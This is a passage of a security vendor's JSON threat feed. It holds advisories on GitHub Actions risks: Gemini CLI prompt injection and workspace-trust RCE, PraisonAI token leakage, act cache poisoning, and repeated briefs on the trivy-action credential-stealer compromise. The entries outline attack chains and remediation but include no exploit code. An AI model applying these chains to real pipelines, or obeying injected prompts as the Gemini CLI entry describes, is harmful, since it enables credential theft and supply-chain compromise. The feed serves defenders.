{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/github-actions/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Gemini CLI","run-gemini-cli GitHub Action"],"_cs_severities":["critical"],"_cs_tags":["rce","supply-chain","github-actions"],"_cs_type":"advisory","_cs_vendors":["Google"],"content_html":"\u003cp\u003eGemini CLI (\u003ccode\u003e@google/gemini-cli\u003c/code\u003e) versions prior to 0.39.1 and version 0.40.0-preview.2, along with the \u003ccode\u003erun-gemini-cli\u003c/code\u003e GitHub Action versions prior to 0.1.22, are susceptible to remote code execution due to insecure workspace trust handling and tool allowlisting bypasses. The vulnerability arises from the automatic trust of workspace folders in headless mode, allowing malicious environment variables within the \u003ccode\u003e.gemini/\u003c/code\u003e directory to be exploited. Furthermore, in \u003ccode\u003e--yolo\u003c/code\u003e mode, the tool allowlist was previously ignored, enabling prompt injection and code execution via commands like \u003ccode\u003erun_shell_command\u003c/code\u003e. This poses a risk, especially in CI/CD environments that process untrusted inputs such as pull requests. The patched version 0.39.1 enforces explicit folder trust in headless mode and properly evaluates tool allowlists under \u003ccode\u003e--yolo\u003c/code\u003e, mitigating these risks. This impacts all Gemini CLI GitHub Actions and requires users to review their workflows.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker submits a malicious pull request to a repository using Gemini CLI in a GitHub Actions workflow.\u003c/li\u003e\n\u003cli\u003eThe workflow, running in headless mode, automatically trusts the workspace folder (versions prior to 0.39.1).\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s pull request includes a crafted \u003ccode\u003e.gemini/\u003c/code\u003e directory containing malicious environment variables.\u003c/li\u003e\n\u003cli\u003eGemini CLI loads the malicious environment variables, leading to code execution.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker injects a malicious prompt leveraging \u003ccode\u003erun_shell_command\u003c/code\u003e when \u003ccode\u003e--yolo\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003erun_shell_command\u003c/code\u003e executes arbitrary commands on the runner due to the bypassed tool allowlist (versions prior to 0.39.1).\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the CI/CD runner, potentially exfiltrating secrets or injecting malicious code into the deployment pipeline.\u003c/li\u003e\n\u003cli\u003eSuccessful exploitation leads to code execution on the CI/CD runner, data exfiltration, or supply chain compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe vulnerability impacts workflows utilizing Gemini CLI in headless mode, particularly those processing untrusted inputs such as pull requests from external contributors. Successful exploitation can lead to remote code execution on the CI/CD runner, potentially enabling attackers to exfiltrate sensitive information, such as API keys and credentials, or inject malicious code into the application deployment pipeline. This can lead to a supply chain compromise. All Gemini CLI GitHub Actions are affected, requiring users to review and update their workflows.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade \u003ccode\u003e@google/gemini-cli\u003c/code\u003e to version 0.39.1 or later, or 0.40.0-preview.3 if using a preview version.\u003c/li\u003e\n\u003cli\u003eUpgrade \u003ccode\u003eactions/google-github-actions/run-gemini-cli\u003c/code\u003e to version 0.1.22 or later.\u003c/li\u003e\n\u003cli\u003eFor workflows running on trusted inputs, set \u003ccode\u003eGEMINI_TRUST_WORKSPACE: 'true'\u003c/code\u003e in the GitHub Actions workflow.\u003c/li\u003e\n\u003cli\u003eFor workflows processing untrusted inputs, review the hardening guidance in \u003ca href=\"https://github.com/google-github-actions/run-gemini-cli\"\u003egoogle-github-actions/run-gemini-cli\u003c/a\u003e and set the environment variable accordingly.\u003c/li\u003e\n\u003cli\u003eReview and harden tool allowlists in \u003ccode\u003e~/.gemini/settings.json\u003c/code\u003e to restrict the commands that can be executed, especially when using the \u003ccode\u003e--yolo\u003c/code\u003e flag.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-24T19:30:01Z","date_published":"2026-04-24T19:30:01Z","id":"/briefs/2026-04-gemini-cli-rce/","summary":"Gemini CLI is vulnerable to remote code execution via workspace trust and tool allowlisting bypasses, impacting headless mode and GitHub Actions workflows.","title":"Gemini CLI Remote Code Execution via Workspace Trust and Tool Allowlisting Bypasses","url":"https://feed.craftedsignal.io/briefs/2026-04-gemini-cli-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.1,"id":"CVE-2026-40313"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["credential-leakage","supply-chain","github-actions","cve-2026-40313"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003ePraisonAI, a multi-agent teams system, faces a critical vulnerability (CVE-2026-40313) in versions 4.5.139 and below. The vulnerability stems from the ArtiPACKED attack vector within GitHub Actions workflows. Specifically, the use of actions/checkout without setting \u003ccode\u003epersist-credentials: false\u003c/code\u003e causes the GITHUB_TOKEN to be written to the \u003ccode\u003e.git/config\u003c/code\u003e file. When subsequent workflow steps upload artifacts (build outputs, logs, test results, etc.), these tokens can be inadvertently included. Given that PraisonAI is a public repository, any user with read access can download these artifacts and extract the leaked tokens. Successful exploitation allows attackers to push malicious code, poison releases and PyPI/Docker packages, steal repository secrets, and ultimately compromise the entire supply chain, affecting all downstream users. The issue is present across multiple workflow and action files within the \u003ccode\u003e.github/workflows/\u003c/code\u003e and \u003ccode\u003e.github/actions/\u003c/code\u003e directories. Version 4.5.140 addresses and resolves this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains read access to the public PraisonAI GitHub repository.\u003c/li\u003e\n\u003cli\u003eAttacker identifies a GitHub Actions workflow that uploads artifacts.\u003c/li\u003e\n\u003cli\u003eThe workflow uses \u003ccode\u003eactions/checkout\u003c/code\u003e without \u003ccode\u003epersist-credentials: false\u003c/code\u003e, causing the GITHUB_TOKEN to be written to \u003ccode\u003e.git/config\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe workflow uploads an artifact (e.g., build output, logs, test results) that includes the \u003ccode\u003e.git/config\u003c/code\u003e file.\u003c/li\u003e\n\u003cli\u003eAttacker downloads the artifact.\u003c/li\u003e\n\u003cli\u003eAttacker extracts the GITHUB_TOKEN from the \u003ccode\u003e.git/config\u003c/code\u003e file within the artifact.\u003c/li\u003e\n\u003cli\u003eAttacker uses the leaked GITHUB_TOKEN to authenticate to the PraisonAI repository.\u003c/li\u003e\n\u003cli\u003eAttacker leverages the compromised GITHUB_TOKEN to inject malicious code, poison releases/packages, steal secrets, or perform other malicious activities, leading to a supply chain compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-40313 in PraisonAI versions 4.5.139 and below can result in a severe supply chain compromise. Attackers can inject malicious code into the PraisonAI repository, poison releases and associated packages (PyPI, Docker), and steal sensitive repository secrets. This can lead to widespread distribution of malware to downstream users of PraisonAI, compromising their systems and data. The vulnerability affects any user relying on PraisonAI and its distributed components.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade PraisonAI to version 4.5.140 or later to patch CVE-2026-40313.\u003c/li\u003e\n\u003cli\u003eAudit all GitHub Actions workflows in your organization to ensure that \u003ccode\u003eactions/checkout\u003c/code\u003e is used with \u003ccode\u003epersist-credentials: false\u003c/code\u003e to prevent credential leakage.\u003c/li\u003e\n\u003cli\u003eMonitor public repositories for inadvertently exposed configuration files containing credentials, and rotate potentially compromised tokens immediately.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u0026ldquo;Detect GitHub Workflow Artifact Containing Git Config\u0026rdquo; to identify leaked git configurations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-14T04:17:13Z","date_published":"2026-04-14T04:17:13Z","id":"/briefs/2026-04-praisonai-artifact-leakage/","summary":"PraisonAI versions 4.5.139 and below are vulnerable to credential leakage due to the ArtiPACKED attack, where GitHub Actions workflows using actions/checkout without persist-credentials: false write the GITHUB_TOKEN into the .git/config file, leading to potential exposure in uploaded artifacts and subsequent supply chain compromise.","title":"PraisonAI GitHub Actions Credential Leakage Vulnerability (CVE-2026-40313)","url":"https://feed.craftedsignal.io/briefs/2026-04-praisonai-artifact-leakage/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","github-actions","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, CrowdStrike detected a spike in script execution on Linux-based GitHub Actions runners. Investigation traced the activity to a compromise of the aquasecurity/trivy-action GitHub Action, a widely used open-source vulnerability scanner in CI/CD pipelines. The compromise involved retroactively poisoning 76 of the scanner\u0026rsquo;s 77 release tags through git tag repointing. This replaced the legitimate entry point with a multi-stage credential stealer. The malicious code ran before the actual scanner, making the compromise difficult to detect as workflows appeared to complete normally. Aqua Security confirmed the compromise of the Trivy GitHub Action script, setup script, and binary, and removed the malicious artifacts. This supply chain attack highlights the risk of relying on third-party actions in CI/CD pipelines without proper verification and monitoring.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA developer pushes code, opens a pull request, or merges a branch in a repository using the compromised trivy-action.\u003c/li\u003e\n\u003cli\u003eThe GitHub Actions runner executes the workflow, downloading the specified version of the trivy-action. Due to tag repointing, a malicious version of the action is downloaded instead of the legitimate one.\u003c/li\u003e\n\u003cli\u003eThe malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script is executed, which prepends approximately 105 lines of attack code before the original Trivy scanner logic.\u003c/li\u003e\n\u003cli\u003eThe malicious script enumerates process IDs (PIDs) on the runner to identify potential targets.\u003c/li\u003e\n\u003cli\u003eThe script executes a multi-stage credential theft operation, stealing secrets and credentials available within the runner environment.\u003c/li\u003e\n\u003cli\u003eThe legitimate Trivy scanner is executed after the malicious code, masking the compromise as the workflow appears to complete successfully.\u003c/li\u003e\n\u003cli\u003eStolen credentials are exfiltrated to a destination controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to gain unauthorized access to internal infrastructure, cloud resources, or other sensitive systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain compromise affected users of the aquasecurity/trivy-action GitHub Action. The retroactive poisoning of 76 release tags meant that any CI/CD pipeline using those versions of the action was potentially compromised. The impact included the potential theft of sensitive credentials, secrets, and API keys stored within the GitHub Actions runner environment. Successful credential theft could lead to unauthorized access to critical infrastructure, data breaches, and further downstream attacks. The number of affected organizations is unknown, but given the popularity of trivy-action, the scope could be significant.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReview your GitHub Actions workflows for usage of \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e and verify the integrity of the action\u0026rsquo;s code. Consider pinning to specific commit SHAs instead of tags to avoid tag repointing attacks.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Script Execution in GitHub Actions Runner\u003c/code\u003e to identify potentially malicious script execution within GitHub Actions runner environments.\u003c/li\u003e\n\u003cli\u003eMonitor process execution on GitHub Actions runners for unusual or unexpected activity, particularly scripts running from temporary directories, to detect deviations from expected CI/CD behavior.\u003c/li\u003e\n\u003cli\u003eImplement strict access controls and credential management policies for GitHub Actions secrets and credentials to minimize the impact of potential credential theft.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T08:36:29Z","date_published":"2026-03-31T08:36:29Z","id":"/briefs/2026-04-trivy-supply-chain/","summary":"The trivy-action GitHub Action was compromised via git tag repointing, where 76 of 77 release tags were retroactively poisoned, leading to a multi-stage credential theft operation discovered following a spike in script execution detections on Linux runners.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-04-trivy-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","github-actions","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, a spike in suspicious script executions on Linux GitHub Actions runners was observed across multiple CrowdStrike Falcon platform customers. The investigation traced the activity to a supply chain compromise within the widely-used aquasecurity/trivy-action GitHub Action, a popular open-source vulnerability scanner used in CI/CD pipelines. Attackers retroactively poisoned 76 out of 77 release tags by repointing them to malicious commits. This allowed them to inject a multi-stage credential stealer into the action\u0026rsquo;s \u003ccode\u003eentrypoint.sh\u003c/code\u003e script. The malicious code executes before the legitimate scanner, making the compromise less noticeable. Aqua Security confirmed the compromise of the Trivy GitHub Action script, setup script, and binary and has removed the malicious artifacts. This incident highlights the risks associated with trusting third-party actions in CI/CD pipelines and the potential for attackers to exploit tag mutability in Git.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains unauthorized write access to the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub repository.\u003c/li\u003e\n\u003cli\u003eThe attacker retroactively modifies existing Git tags (e.g., \u003ccode\u003e0.24.0\u003c/code\u003e) to point to a malicious commit.\u003c/li\u003e\n\u003cli\u003eThe malicious commit injects approximately 105 lines of malicious code into the \u003ccode\u003eentrypoint.sh\u003c/code\u003e script, prepended before the legitimate Trivy scanner logic.\u003c/li\u003e\n\u003cli\u003eA GitHub Actions workflow includes a step using the compromised \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e by referencing a poisoned tag (e.g., \u003ccode\u003e- uses: aquasecurity/trivy-action@0.24.0\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWhen the workflow runs on a GitHub Actions runner, the runner downloads the compromised action and executes the malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script.\u003c/li\u003e\n\u003cli\u003eThe malicious code in \u003ccode\u003eentrypoint.sh\u003c/code\u003e enumerates running processes to identify potential credential sources and exfiltrates sensitive data.\u003c/li\u003e\n\u003cli\u003eThe legitimate Trivy scanner executes, masking the malicious activity.\u003c/li\u003e\n\u003cli\u003eThe attacker gains access to stolen credentials, secrets, and API keys, potentially allowing them to compromise cloud infrastructure, internal systems, and source code repositories.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack directly impacted organizations using the compromised \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub Action in their CI/CD pipelines. The number of affected organizations is currently unknown, but given the action\u0026rsquo;s popularity, it is likely significant. Successful exploitation allows attackers to steal sensitive credentials, including API keys, cloud credentials, and deploy tokens. This can lead to unauthorized access to internal infrastructure, data exfiltration, and further compromise of the software supply chain. The incident highlights the critical importance of verifying the integrity of third-party dependencies and implementing robust security measures in CI/CD environments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately audit your GitHub Actions workflows for usage of the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e and update to a safe version (as provided by Aqua Security) or remove the action entirely.\u003c/li\u003e\n\u003cli\u003eImplement integrity checks for third-party GitHub Actions by verifying the commit SHA instead of relying solely on tags to mitigate tag re-pointing attacks.\u003c/li\u003e\n\u003cli\u003eMonitor process execution on GitHub Actions runners for suspicious scripts, especially those running from within action directories, using process creation logs. An example detection rule is provided below.\u003c/li\u003e\n\u003cli\u003eEnable network connection logging on GitHub Actions runners to identify potential data exfiltration attempts originating from action scripts.\u003c/li\u003e\n\u003cli\u003eReview GitHub Actions logs for any anomalies or unexpected behavior that may indicate a compromise.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T07:24:09Z","date_published":"2026-03-31T07:24:09Z","id":"/briefs/2026-04-trivy-action-supply-chain/","summary":"The aquasecurity/trivy-action GitHub Action was compromised via git tag repointing, injecting malicious code into the entrypoint.sh script to steal credentials from CI/CD pipelines before executing the legitimate Trivy scanner.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-04-trivy-action-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","github-actions","credential-theft","linux"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, CrowdStrike detected a spike in suspicious script executions on Linux-based GitHub Actions runners, which led to the discovery of a supply chain compromise affecting the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub Action. This action is a popular open-source vulnerability scanner frequently used in CI/CD pipelines. The attacker retroactively poisoned 76 of the 77 release tags by repointing them to malicious commits. These commits replaced the legitimate entry point with a multi-stage credential stealer. The injected code executes before the original scanner, allowing workflows to complete seemingly normally while secretly exfiltrating sensitive information. Aqua Security has confirmed and removed the malicious artifacts. This incident highlights the risks associated with mutable tags in Git-based workflows and the importance of verifying action integrity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains write access to the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e repository on GitHub.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies the action\u0026rsquo;s \u003ccode\u003eentrypoint.sh\u003c/code\u003e script to include malicious code for credential theft. Specifically, the attacker prepends approximately 105 lines of malicious code.\u003c/li\u003e\n\u003cli\u003eThe attacker uses git tag repointing to retroactively poison existing release tags (e.g., \u003ccode\u003e@0.24.0\u003c/code\u003e) to point to the malicious commit.\u003c/li\u003e\n\u003cli\u003eDevelopers\u0026rsquo; CI/CD pipelines reference the compromised \u003ccode\u003etrivy-action\u003c/code\u003e using a poisoned tag (e.g., \u003ccode\u003eaquasecurity/trivy-action@0.24.0\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWhen a workflow runs, the GitHub Actions runner downloads and executes the malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script, granting it access to the runner\u0026rsquo;s environment, secrets, and network.\u003c/li\u003e\n\u003cli\u003eThe malicious script enumerates running processes to identify potential targets for credential theft.\u003c/li\u003e\n\u003cli\u003eThe malicious code exfiltrates credentials and secrets.\u003c/li\u003e\n\u003cli\u003eThe original \u003ccode\u003etrivy\u003c/code\u003e scanner is executed, masking the malicious activity and allowing the workflow to complete normally.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the \u003ccode\u003etrivy-action\u003c/code\u003e GitHub Action allowed attackers to steal credentials and secrets from CI/CD pipelines that used the compromised action. Because the malicious code ran with the full privileges of the runner, it had access to sensitive information such as API keys, deployment tokens, and cloud credentials. The number of affected organizations is unknown, but given the widespread adoption of \u003ccode\u003etrivy-action\u003c/code\u003e, the potential impact is significant. Successful exploitation can lead to unauthorized access to cloud resources, code repositories, and other sensitive systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect your CI/CD pipeline configurations for usage of the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e and audit the integrity of the referenced tags against the known good commits, if available from Aqua Security\u0026rsquo;s advisories.\u003c/li\u003e\n\u003cli\u003eImplement tooling and processes to verify the integrity of third-party GitHub Actions used in CI/CD pipelines.\u003c/li\u003e\n\u003cli\u003eMonitor process execution on GitHub Actions runners for suspicious activity, such as enumeration of processes or unexpected network connections (see Sigma rule below).\u003c/li\u003e\n\u003cli\u003eEnable and review process creation logs on CI/CD runner environments to identify anomalous script execution (see Sigma rule below).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T06:07:07Z","date_published":"2026-03-31T06:07:07Z","id":"/briefs/2026-04-trivy-action-compromise/","summary":"The trivy-action GitHub Action, a widely used vulnerability scanner in CI/CD pipelines, was compromised via git tag repointing to inject a multi-stage credential stealer, affecting 76 of 77 release tags.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-04-trivy-action-compromise/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.2,"id":"CVE-2026-34042"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["act","cache-poisoning","rce","github-actions","linux"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe \u003ccode\u003eact\u003c/code\u003e project, designed for local execution of GitHub Actions workflows, contains a critical vulnerability affecting versions prior to 0.2.86. The built-in actions/cache server, intended for local caching, inadvertently listens for connections on all network interfaces. This exposure allows any attacker capable of reaching the server, including those on the internet, to create caches with arbitrary keys and retrieve existing cache data. By predicting the cache keys used by local actions, an attacker can inject malicious content into the cache, paving the way for arbitrary remote code execution within the Docker container used by \u003ccode\u003eact\u003c/code\u003e. This vulnerability was addressed in version 0.2.86 of \u003ccode\u003eact\u003c/code\u003e. The CVSS v3.1 base score is 8.2, indicating a high severity threat.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable \u003ccode\u003eact\u003c/code\u003e instance running a version prior to 0.2.86 with its cache server exposed on all interfaces.\u003c/li\u003e\n\u003cli\u003eThe attacker probes the exposed \u003ccode\u003eact\u003c/code\u003e cache server to determine accessible endpoints and version information.\u003c/li\u003e\n\u003cli\u003eThe attacker analyzes common GitHub Actions workflows and identifies predictable cache keys.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious cache archive containing payloads designed for remote code execution.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads the malicious cache archive to the vulnerable \u003ccode\u003eact\u003c/code\u003e instance using the predicted cache key.\u003c/li\u003e\n\u003cli\u003eA legitimate user triggers a local GitHub Actions workflow using \u003ccode\u003eact\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eact\u003c/code\u003e instance retrieves the attacker\u0026rsquo;s malicious cache archive instead of the expected legitimate cache.\u003c/li\u003e\n\u003cli\u003eThe malicious payload within the cache is executed within the Docker container, leading to remote code execution on the host system running \u003ccode\u003eact\u003c/code\u003e.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to achieve arbitrary remote code execution on the host system running the vulnerable version of \u003ccode\u003eact\u003c/code\u003e. This can lead to complete system compromise, data theft, and further lateral movement within the network. The vulnerability affects any user running a version of \u003ccode\u003eact\u003c/code\u003e prior to 0.2.86 with the cache server exposed. While the number of directly affected users is unknown, the potential impact on development environments and CI/CD pipelines is significant.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to version 0.2.86 or later of the \u003ccode\u003eact\u003c/code\u003e project to remediate the vulnerability (CVE-2026-34042).\u003c/li\u003e\n\u003cli\u003eImplement network access controls to restrict access to the \u003ccode\u003eact\u003c/code\u003e cache server to only trusted networks and hosts.\u003c/li\u003e\n\u003cli\u003eMonitor network connections to the \u003ccode\u003eact\u003c/code\u003e cache server for unexpected or unauthorized access.\u003c/li\u003e\n\u003cli\u003eEnable process monitoring on systems running \u003ccode\u003eact\u003c/code\u003e to detect potentially malicious processes spawned from Docker containers.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T03:15:58Z","date_published":"2026-03-31T03:15:58Z","id":"/briefs/2024-02-29-act-cache-rce/","summary":"A vulnerability in versions prior to 0.2.86 of the act project allows remote attackers to create arbitrary caches, potentially leading to remote code execution within Docker containers by poisoning predicted cache keys.","title":"act Project Cache Poisoning Vulnerability Leads to Potential RCE","url":"https://feed.craftedsignal.io/briefs/2024-02-29-act-cache-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","github-actions"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, CrowdStrike\u0026rsquo;s Engineering team discovered a supply chain compromise targeting the aquasecurity/trivy-action GitHub Action, a popular open-source vulnerability scanner used in CI/CD pipelines. The attackers retroactively poisoned 76 of the scanner’s 77 release tags using git tag repointing, replacing the original entry point with a multi-stage credential stealer. The malicious code operates before the legitimate scanner, masking its activity and allowing workflows to appear normal. This attack highlights the risks associated with mutable tags in Git and the potential for widespread compromise when relying on third-party actions within CI/CD environments. Defenders should implement strong integrity checks and consider using immutable references to mitigate such risks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains write access to the aquasecurity/trivy-action repository.\u003c/li\u003e\n\u003cli\u003eThe attacker uses git tag repointing to modify existing release tags (e.g., 0.24.0), replacing the legitimate entrypoint.sh script with a malicious version.\u003c/li\u003e\n\u003cli\u003eA developer\u0026rsquo;s CI/CD pipeline includes a step that uses the compromised trivy-action by referencing a poisoned tag (e.g., uses: \u003ca href=\"mailto:aquasecurity/trivy-action@0.24.0\"\u003eaquasecurity/trivy-action@0.24.0\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eWhen the workflow runs on a GitHub Actions runner, the runner downloads the compromised action and executes the malicious entrypoint.sh script.\u003c/li\u003e\n\u003cli\u003eThe malicious script enumerates running processes to identify potential credential sources.\u003c/li\u003e\n\u003cli\u003eThe script steals credentials and secrets from the runner\u0026rsquo;s environment, including API keys, deployment tokens, and cloud credentials.\u003c/li\u003e\n\u003cli\u003eAfter stealing credentials, the malicious script executes the legitimate Trivy scanner to avoid raising suspicion.\u003c/li\u003e\n\u003cli\u003eThe stolen credentials are used to gain unauthorized access to internal infrastructure and resources.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the trivy-action GitHub Action could impact a significant number of organizations relying on this popular scanner in their CI/CD pipelines. With 76 of 77 release tags poisoned, the potential scope of the attack is broad. Successful exploitation leads to the theft of sensitive credentials, enabling attackers to access internal infrastructure, deploy malicious code, or exfiltrate sensitive data. The silent nature of the attack, with the legitimate scanner still running, makes detection challenging and increases the dwell time of the attacker.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process monitoring on GitHub Actions runners to detect suspicious script execution and unusual process trees (reference: Attack Chain).\u003c/li\u003e\n\u003cli\u003eImplement integrity checks for third-party actions used in CI/CD pipelines to verify their authenticity and prevent tampering (reference: Overview).\u003c/li\u003e\n\u003cli\u003eConsider using immutable references (e.g., commit SHAs instead of tags) for GitHub Actions to prevent tag repointing attacks (reference: Overview).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule below to detect suspicious bash scripts executing in the context of GitHub Action runners (reference: rules).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-30T06:24:43Z","date_published":"2026-03-30T06:24:43Z","id":"/briefs/2026-03-trivy-action-supply-chain/","summary":"The aquasecurity/trivy-action GitHub Action was compromised via git tag repointing, injecting a multi-stage credential stealer into CI/CD pipelines, allowing for the theft of secrets and credentials.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-03-trivy-action-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","github-actions"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, a spike in script execution detections on Linux-based GitHub Actions runners led to the discovery of a supply chain compromise affecting the aquasecurity/trivy-action GitHub Action. The attackers retroactively poisoned 76 of the 77 release tags by repointing them to malicious commits. This manipulation replaced the legitimate entry point with a multi-stage credential stealer. The malicious code operates silently before the legitimate Trivy scanner logic is executed, which allows the malicious activity to remain hidden as workflows appear to complete normally. Aqua Security has confirmed the compromise and removed the malicious artifacts. This incident highlights the risks associated with trusting third-party actions in CI/CD pipelines and the potential for attackers to gain access to sensitive credentials and internal infrastructure.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA developer triggers a GitHub Actions workflow that utilizes the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe GitHub Actions runner downloads the specified version of the \u003ccode\u003etrivy-action\u003c/code\u003e from GitHub.\u003c/li\u003e\n\u003cli\u003eDue to tag repointing, the downloaded action contains malicious code in the \u003ccode\u003eentrypoint.sh\u003c/code\u003e script.\u003c/li\u003e\n\u003cli\u003eThe malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script executes a multi-stage credential theft operation.\u003c/li\u003e\n\u003cli\u003eThe script enumerates process 